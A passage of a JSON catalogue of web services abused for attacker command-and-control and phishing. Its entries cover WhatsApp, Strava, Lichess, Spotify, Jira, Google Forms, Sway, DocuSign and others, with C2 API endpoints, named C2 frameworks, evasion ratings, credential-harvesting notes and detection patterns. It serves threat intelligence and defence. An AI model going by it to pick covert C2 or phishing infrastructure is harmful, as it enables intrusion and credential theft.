    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free \u00b7 Phone number required \u00b7 E2E encrypted \u00b7 2GB file transfer"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": true,
      "notes": "Phone-based auth \u00b7 No SSO"
    },
    "knownC2": [
      {
        "name": "whatsappcli",
        "url": "https://github.com/KarimJedda/whatsappcli"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1573.002"
    ],
    "refs": [
      {
        "title": "lolc2 - WhatsApp",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "v.whatsapp.net/v2/*",
      "c.whatsapp.net",
      "mms.whatsapp.net"
    ],
    "notes": "1 lolc2 C2 framework. XMPP-based C2 via WhatsApp Web automation (Yowsup/whatsapp-web.js). E2E encrypted traffic. Detection: unusual XMPP traffic to c.whatsapp.net from non-mobile devices",
    "customDomain": false,
    "customDomainNotes": "N/A - messaging",
    "dataRetention": "Permanent (cloud backup optional)",
    "rateLimits": "Business API: 80 msg/s. Yowsup detected",
    "maxFileSize": "2GB per file",
    "logging": "No audit logs",
    "lolc2Url": "https://lolc2.github.io/#whatsapp"
  },
  {
    "name": "Strava",
    "url": "https://strava.com",
    "category": "C2 Channel",
    "provider": "Strava",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "strava.com",
      "www.strava.com/api/*"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "www.strava.com/api/v3/activities*"
    ],
    "opsec": "low",
    "opsecNotes": "Activity descriptions for C2 data. Extremely unexpected. ConceptC2 framework",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Zero C2 detection. Fitness platform with no security team monitoring API abuse",
    "verification": "Email only. OAuth for API",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 API with OAuth \u00b7 100 req/15min for read \u00b7 200/day for activities"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "OAuth for API"
    },
    "knownC2": [
      {
        "name": "ConceptC2",
        "url": "https://github.com/BongoKnight/ConceptC2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Strava API",
        "url": "https://developers.strava.com/"
      },
      {
        "title": "lolc2 - Strava",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "www.strava.com/api/v3/activities*",
      "www.strava.com/oauth/token"
    ],
    "notes": "1 lolc2 C2 framework (ConceptC2). Activity descriptions as C2 dead drops. Fitness app - zero SOC coverage. Most creative LOL C2 channel",
    "customDomain": false,
    "customDomainNotes": "N/A - fitness platform",
    "dataRetention": "Permanent",
    "rateLimits": "API: 100 req/15min, 1000/day",
    "maxFileSize": "N/A",
    "logging": "No audit logs",
    "lolc2Url": "https://lolc2.github.io/#strava"
  },
  {
    "name": "Lichess",
    "url": "https://lichess.org",
    "category": "C2 Channel",
    "provider": "Lichess",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "lichess.org"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "lichess.org/api/bot/game/*/move/*",
      "lichess.org/api/challenge/*",
      "lichess.org/api/stream/event"
    ],
    "opsec": "low",
    "opsecNotes": "Chess moves as C2 commands. Bot API for automated C2 via chess games",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Open-source chess platform. Bot API is legitimate feature. Zero abuse monitoring",
    "verification": "Email only. No verification",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 Open source \u00b7 API unlimited for bots \u00b7 No rate limits"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "OAuth/API token for bot"
    },
    "knownC2": [
      {
        "name": "Malnus-Carlware",
        "url": "https://github.com/0x-Apollyon/Malnus-Carlware"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Lichess API",
        "url": "https://lichess.org/api"
      },
      {
        "title": "lolc2 - Lichess",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "lichess.org/api/bot/game/*/move/*",
      "lichess.org/api/challenge/*",
      "lichess.org/api/stream/event"
    ],
    "notes": "1 lolc2 C2 framework (Malnus-Carlware). Chess moves encode C2 commands. Bot challenges trigger new C2 sessions. Incredibly creative - no SOC on Earth monitors chess API traffic",
    "customDomain": false,
    "customDomainNotes": "N/A - chess platform",
    "dataRetention": "Permanent",
    "rateLimits": "API: 1 req/s authenticated",
    "maxFileSize": "N/A",
    "logging": "No audit logs",
    "lolc2Url": "https://lolc2.github.io/#lichess"
  },
  {
    "name": "Spotify",
    "url": "https://spotify.com",
    "category": "C2 Channel",
    "provider": "Spotify",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "api.spotify.com",
      "p.scdn.co"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.spotify.com/v1/*",
      "p.scdn.co/mp3-preview/"
    ],
    "opsec": "low",
    "opsecNotes": "SoundShell uses Spotify API for C2. Playlist/track metadata as dead drops",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "API rate limits but no C2 detection. Developer portal is straightforward",
    "verification": "Email only. Developer portal free",
    "trust": "medium",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 API with OAuth \u00b7 30-day free premium trial"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "OAuth for API"
    },
    "knownC2": [
      {
        "name": "SoundShell",
        "url": "https://github.com/Kaiser784/SoundShell"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Spotify API",
        "url": "https://developer.spotify.com/documentation/web-api"
      },
      {
        "title": "lolc2 - Spotify",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "api.spotify.com/v1/*",
      "p.scdn.co/mp3-preview/"
    ],
    "notes": "1 lolc2 C2 framework (SoundShell). Playlist/track metadata for C2 commands. Audio previews via CDN. Music streaming API - zero detection coverage",
    "customDomain": false,
    "customDomainNotes": "N/A - music platform",
    "dataRetention": "Permanent (playlists)",
    "rateLimits": "API: rate limited per endpoint",
    "maxFileSize": "N/A",
    "logging": "No audit logs",
    "lolc2Url": "https://lolc2.github.io/#spotify"
  },
  {
    "name": "SoundCloud",
    "url": "https://soundcloud.com",
    "category": "C2 Channel",
    "provider": "SoundCloud",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "api-v2.soundcloud.com",
      "api.soundcloud.com",
      "cf-media.sndcdn.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api-v2.soundcloud.com/*",
      "api.soundcloud.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "LivingOffAlexa uses SoundCloud API + Alexa for C2",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal API monitoring. Declining platform with less enforcement",
    "verification": "Email only",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free \u00b7 API available \u00b7 Upload unlimited tracks"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "OAuth for API"
    },
    "knownC2": [
      {
        "name": "LivingOffAlexa",
        "url": "https://github.com/reevesrs24/LivingOffAlexa"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "SoundCloud API",
        "url": "https://developers.soundcloud.com/docs/api/guide"
      },
      {
        "title": "lolc2 - SoundCloud",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "api-v2.soundcloud.com/*",
      "cf-media.sndcdn.com/*"
    ],
    "notes": "1 lolc2 C2 framework (LivingOffAlexa). Uses SoundCloud + Amazon Alexa for C2 chain. Track metadata for commands",
    "customDomain": false,
    "customDomainNotes": "N/A - audio platform",
    "dataRetention": "Permanent",
    "rateLimits": "API: rate limited",
    "maxFileSize": "5GB free upload",
    "logging": "No audit logs",
    "lolc2Url": "https://lolc2.github.io/#soundcloud"
  },
  {
    "name": "DuckDuckGo",
    "url": "https://duckduckgo.com",
    "category": "C2 Channel",
    "provider": "DuckDuckGo",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "proxy.duckduckgo.com",
      "*.pythonanywhere.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "proxy.duckduckgo.com/iu/*"
    ],
    "opsec": "low",
    "opsecNotes": "DDG image proxy to tunnel C2 commands through trusted DDG domain. No signup needed",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Image proxy is anonymous. No account. No abuse tracking",
    "verification": "No signup required",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free \u00b7 No account \u00b7 Image proxy is anonymous"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth needed"
    },
    "knownC2": [
      {
        "name": "DuckDuckC2",
        "url": "https://github.com/nopcorn/DuckDuckC2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1090.004"
    ],
    "refs": [
      {
        "title": "lolc2 - DuckDuckGo",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "proxy.duckduckgo.com/iu/?u=*"
    ],
    "notes": "1 lolc2 C2 framework (DuckDuckC2). Abuses DDG image proxy to tunnel C2 through trusted domain. NO SIGNUP needed. Detection: repeated requests to proxy.duckduckgo.com/iu/ with encoded URLs",
    "customDomain": false,
    "customDomainNotes": "N/A - search engine",
    "dataRetention": "No data stored",
    "rateLimits": "No explicit rate limit",
    "maxFileSize": "N/A",
    "logging": "No logging by design",
    "lolc2Url": "https://lolc2.github.io/#duckduckgo"
  },
  {
    "name": "Asana",
    "url": "https://asana.com",
    "category": "C2 Channel",
    "provider": "Asana",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "app.asana.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "app.asana.com/api/1.0/projects/*",
      "app.asana.com/api/1.0/tasks/*",
      "app.asana.com/api/1.0/attachments/*"
    ],
    "opsec": "low",
    "opsecNotes": "C3 channel uses Asana tasks for C2 messaging. Project management tool - rarely monitored",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "API abuse rarely monitored. Enterprise project management tool",
    "verification": "Email only. Free for up to 15 users",
    "trust": "medium",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: unlimited tasks/projects \u00b7 15 team members \u00b7 100MB file upload \u00b7 API free"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Business+ \u00b7 OAuth for API"
    },
    "knownC2": [
      {
        "name": "C3/Asana",
        "url": "https://github.com/WithSecureLabs/C3"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Asana Pricing",
        "url": "https://asana.com/pricing"
      },
      {
        "title": "Asana API",
        "url": "https://developers.asana.com/docs/"
      },
      {
        "title": "lolc2 - Asana",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "app.asana.com/api/1.0/tasks/*",
      "app.asana.com/api/1.0/attachments/*"
    ],
    "notes": "1 lolc2 C2 framework (C3/Asana from WithSecureLabs). Task descriptions carry C2 commands. Attachments for file transfer. Project management API - enterprise trusted",
    "customDomain": false,
    "customDomainNotes": "N/A - project management",
    "dataRetention": "Permanent",
    "rateLimits": "API: 150 req/min",
    "maxFileSize": "100MB per attachment",
    "logging": "Audit log on Enterprise",
    "lolc2Url": "https://lolc2.github.io/#asana"
  },
  {
    "name": "Jira",
    "url": "https://www.atlassian.com/software/jira",
    "category": "C2 Channel",
    "provider": "Atlassian",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.atlassian.net"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "*.atlassian.net/rest/api/2/issue/*",
      "*.atlassian.net/rest/api/2/search*",
      "*.atlassian.net/rest/api/2/attachment/*"
    ],
    "opsec": "low",
    "opsecNotes": "C3 channel uses Jira issues for C2. Enterprise ticketing tool - universally trusted",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "API abuse rarely monitored. Enterprise trusted",
    "verification": "Email (Atlassian account). Free up to 10 users",
    "trust": "medium",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: up to 10 users \u00b7 2GB storage \u00b7 Community support \u00b7 API free"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM via Atlassian Access \u00b7 OAuth for API"
    },
    "knownC2": [
      {
        "name": "C3/Jira",
        "url": "https://github.com/WithSecureLabs/C3"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Jira Pricing",
        "url": "https://www.atlassian.com/software/jira/pricing"
      },
      {
        "title": "Jira REST API",
        "url": "https://developer.atlassian.com/cloud/jira/platform/rest/v3/intro/"
      },
      {
        "title": "lolc2 - Jira",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "*.atlassian.net/rest/api/2/issue/*",
      "*.atlassian.net/rest/api/2/attachment/*"
    ],
    "notes": "1 lolc2 C2 framework (C3/Jira from WithSecureLabs). Issue descriptions carry C2 commands. Attachments for file transfer. Jira API traffic is universally trusted in enterprise environments",
    "customDomain": false,
    "customDomainNotes": "N/A - project management",
    "dataRetention": "Permanent",
    "rateLimits": "API: rate limited per user",
    "maxFileSize": "250MB per attachment",
    "logging": "Audit log on Premium+",
    "lolc2Url": "https://lolc2.github.io/#jira"
  },
  {
    "name": "Cisco Webex",
    "url": "https://webex.com",
    "category": "C2 Channel",
    "provider": "Cisco",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "webex.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "*/v1/messages",
      "*/v1/rooms"
    ],
    "opsec": "low",
    "opsecNotes": "C3 channel uses Webex rooms/messages for C2. Cisco enterprise platform",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Enterprise trusted. Cisco security team exists but C2 via chat is novel",
    "verification": "Email only. Free tier available",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 100 participants \u00b7 Unlimited messaging \u00b7 5GB storage \u00b7 API free"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on paid plans \u00b7 OAuth for API"
    },
    "knownC2": [
      {
        "name": "C3/Webex",
        "url": "https://github.com/WithSecureLabs/C3"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Webex Pricing",
        "url": "https://www.webex.com/pricing/index.html"
      },
      {
        "title": "Webex API",
        "url": "https://developer.webex.com/docs/getting-started"
      },
      {
        "title": "lolc2 - Webex",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "*/v1/messages",
      "*/v1/messages?max=*&roomId=*",
      "*/v1/rooms"
    ],
    "notes": "1 lolc2 C2 framework (C3/Webex). Messages in Webex rooms for C2. Cisco-owned = enterprise trusted. Free plan includes unlimited messaging",
    "customDomain": false,
    "customDomainNotes": "N/A - messaging",
    "dataRetention": "Retention per org policy",
    "rateLimits": "API: 100 req/min",
    "maxFileSize": "100MB per file",
    "logging": "Compliance Officer role, eDiscovery on Pro Pack",
    "lolc2Url": "https://lolc2.github.io/#cisco-webex"
  },
  {
    "name": "Mattermost",
    "url": "https://mattermost.com",
    "category": "C2 Channel",
    "provider": "Mattermost",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.mattermost.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "*/api/v4/posts/*",
      "*/api/v4/channels",
      "*/api/v4/teams/*"
    ],
    "opsec": "low",
    "opsecNotes": "C3 channel uses Mattermost API. Self-hostable Slack alternative",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Self-hostable. Open source. No central abuse enforcement",
    "verification": "Email per instance. Self-hosted = full control",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: self-hosted unlimited \u00b7 Cloud free up to 10k message history"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise \u00b7 OAuth for integrations"
    },
    "knownC2": [
      {
        "name": "C3/Mattermost",
        "url": "https://github.com/WithSecureLabs/C3"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Mattermost Pricing",
        "url": "https://mattermost.com/pricing/"
      },
      {
        "title": "Mattermost API",
        "url": "https://api.mattermost.com/"
      },
      {
        "title": "lolc2 - Mattermost",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "*/api/v4/posts/*",
      "*/api/v4/channels",
      "*/api/v4/posts/*/thread"
    ],
    "notes": "1 lolc2 C2 framework (C3/Mattermost). Self-hostable for ultimate OPSEC. API for messages/files. Alternative to Slack with less monitoring",
    "customDomain": true,
    "customDomainNotes": "Custom domains on self-hosted",
    "dataRetention": "Permanent (self-hosted)",
    "rateLimits": "API: 10 req/s default",
    "maxFileSize": "50MB per file default",
    "logging": "Compliance exports on Enterprise",
    "lolc2Url": "https://lolc2.github.io/#mattermost"
  },
  {
    "name": "Splunk",
    "url": "https://splunk.com",
    "category": "C2 Channel",
    "provider": "Cisco",
    "signup": "trial",
    "signupTime": "~10min",
    "domains": [
      "*.splunkcloud.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "SplunkWhisperer2 abuses Splunk deployment server for RCE/C2. Post-compromise: access to all ingested security data",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Security product ironically used as C2. No abuse detection for deployment server misconfig",
    "verification": "Email for account. Developer license free",
    "trust": "medium",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "trial",
      "devAccount": true,
      "trialDays": null,
      "limits": "Splunk Free: 500MB/day indexing \u00b7 Cloud trial 15 days \u00b7 Developer license free"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on Enterprise \u00b7 OAuth for API"
    },
    "knownC2": [
      {
        "name": "SplunkWhisperer2",
        "url": "https://github.com/cnotin/SplunkWhisperer2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Splunk Pricing",
        "url": "https://www.splunk.com/en_us/products/pricing.html"
      },
      {
        "title": "lolc2 - Splunk",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "*.splunkcloud.com",
      "*.cloud.splunk.com",
      "api.splunkcloud.com",
      "input-*.cloud.splunk.com",
      "http-inputs-*.splunkcloud.com",
      "*.splunk.com",
      "SplunkHEC: HTTP Event Collector endpoints (port 8088)",
      "Splunk API: /services/collector/event",
      "Splunk Universal Forwarder: TCP 9997 outbound"
    ],
    "notes": "1 lolc2 C2 framework (SplunkWhisperer2). Abuses Splunk Deployment Server for remote code execution. Post-compromise: admin access = complete visibility into target's security logs. Ironic - the SIEM becomes the C2",
    "customDomain": false,
    "customDomainNotes": "N/A - SIEM platform",
    "dataRetention": "Dev license: 500MB/day",
    "rateLimits": "API: no hard limit",
    "maxFileSize": "N/A",
    "logging": "Ironically - Splunk IS the audit log",
    "lolc2Url": "https://lolc2.github.io/#splunk"
  },
  {
    "name": "Google Forms",
    "url": "https://docs.google.com/forms",
    "category": "Phishing",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "docs.google.com/forms"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Credential harvesting on legitimate Google domain. Almost impossible to block. Email notifications on submission",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Google removes phishing forms when reported. Automated scanning exists but is inconsistent",
    "verification": "Google account only",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free \u00b7 Unlimited forms/submissions \u00b7 No account needed to respond"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Part of Google account"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "Google Forms exfil",
        "url": "https://lolexfil.github.io/#tool=Google%20Forms%20/%20public%20form%20submission",
        "note": ""
      }
    ],
    "mitre": [
      "T1566.002",
      "T1598.003"
    ],
    "refs": [
      {
        "title": "Google Forms",
        "url": "https://www.google.com/forms/about/"
      }
    ],
    "detection": [
      "docs.google.com/forms/*",
      "docs.google.com/forms/d/e/*/viewform",
      "docs.google.com/forms/d/e/*/formResponse",
      "forms.gle/*",
      "forms.google.com",
      "POST to /formResponse with entry.* parameters (credential harvesting)",
      "Phishing: embedded Google Forms in emails with pre-filled fields"
    ],
    "notes": "Credential harvesting on trusted Google domain. Impossible to block docs.google.com without breaking business. Response notifications for real-time credential capture",
    "customDomain": false,
    "customDomainNotes": "N/A - form builder",
    "dataRetention": "Permanent (responses in Sheets)",
    "rateLimits": "No explicit API rate limit",
    "maxFileSize": "N/A",
    "logging": "Workspace Audit Logs"
  },
  {
    "name": "Microsoft Forms",
    "url": "https://forms.office.com",
    "category": "Phishing",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "forms.office.com",
      "forms.microsoft.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Trusted Microsoft domain. Great for internal phishing simulations",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Less scrutinized than Google Forms for phishing",
    "verification": "Microsoft account",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free with Microsoft account \u00b7 200 responses on free \u00b7 Unlimited on M365"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Part of M365/Entra SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1598.003"
    ],
    "refs": [
      {
        "title": "Microsoft Forms",
        "url": "https://www.microsoft.com/en-us/microsoft-365/online-surveys-polls-quizzes"
      }
    ],
    "detection": [
      "forms.office.com",
      "forms.microsoft.com",
      "*.officeForms.microsoftonline.com",
      "forms.office.com/Pages/ResponsePage.aspx?id=*",
      "forms.office.com/r/*",
      "M365 Audit Log: FormCreated, FormResponded events",
      "POST to /formapi/api/* with response data (credential harvesting)"
    ],
    "notes": "Credential harvesting on trusted Microsoft domain. forms.office.com is universally trusted by email filters and proxies",
    "customDomain": false,
    "customDomainNotes": "N/A - form builder",
    "dataRetention": "Permanent",
    "rateLimits": "No explicit rate limit",
    "maxFileSize": "N/A",
    "logging": "M365 Audit Logs"
  },
  {
    "name": "Microsoft Sway",
    "url": "https://sway.office.com",
    "category": "Phishing",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "sway.office.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Highly trusted Microsoft domain. Embed redirects and credential capture. Popular for AiTM campaigns",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Microsoft has started scanning Sway pages for phishing in 2024+. Some automated takedowns",
    "verification": "Microsoft account",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free with Microsoft account"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Part of M365 SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "Microsoft Sway",
        "url": "https://sway.office.com/"
      }
    ],
    "detection": [
      "sway.office.com",
      "sway.cloud.microsoft.com",
      "sway.office.com/*/embed",
      "*.sway.com",
      "Sway pages used as phishing landing pages with embedded forms",
      "M365 Audit Log: SwayCreated, SwayEdited events"
    ],
    "notes": "Embed redirects and credential capture pages on sway.office.com. Very popular for AiTM phishing campaigns. Trusted by all email security gateways",
    "customDomain": false,
    "customDomainNotes": "N/A - content creation",
    "dataRetention": "Permanent",
    "rateLimits": "No explicit rate limit",
    "maxFileSize": "N/A",
    "logging": "M365 Audit Logs"
  },
  {
    "name": "Google Sites",
    "url": "https://sites.google.com",
    "category": "Phishing",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "sites.google.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Highly trusted Google domain. Iframe support for embedding attacker content",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Google scans Sites for phishing. Automated takedowns possible but inconsistent",
    "verification": "Google account only",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free \u00b7 Unlimited sites \u00b7 Custom domains on Workspace"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Part of Google account"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "Google Sites",
        "url": "https://sites.google.com/new"
      }
    ],
    "detection": [
      "sites.google.com",
      "sites.google.com/view/*",
      "sites.google.com/*/p/*",
      "*.googlesites.com",
      "Phishing: Google Sites pages impersonating login portals",
      "Google Workspace Audit Log: sites.create, sites.edit events"
    ],
    "notes": "Highly trusted Google domain. Iframe support for embedding attacker-controlled content. Very popular for AiTM phishing landing pages. Cannot be blocked without breaking Google",
    "customDomain": false,
    "customDomainNotes": "N/A - website builder",
    "dataRetention": "Permanent",
    "rateLimits": "No explicit rate limit",
    "maxFileSize": "N/A",
    "logging": "Workspace Audit Logs"
  },
  {
    "name": "DocuSign",
    "url": "https://docusign.com",
    "category": "Phishing",
    "provider": "DocuSign",
    "signup": "trial",
    "signupTime": "~5min",
    "domains": [
      "*.docusign.com",
      "*.docusign.net"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Signing request emails bypass all email filters. Developer account free",
    "socDetection": "unlikely",
    "banRisk": "low",
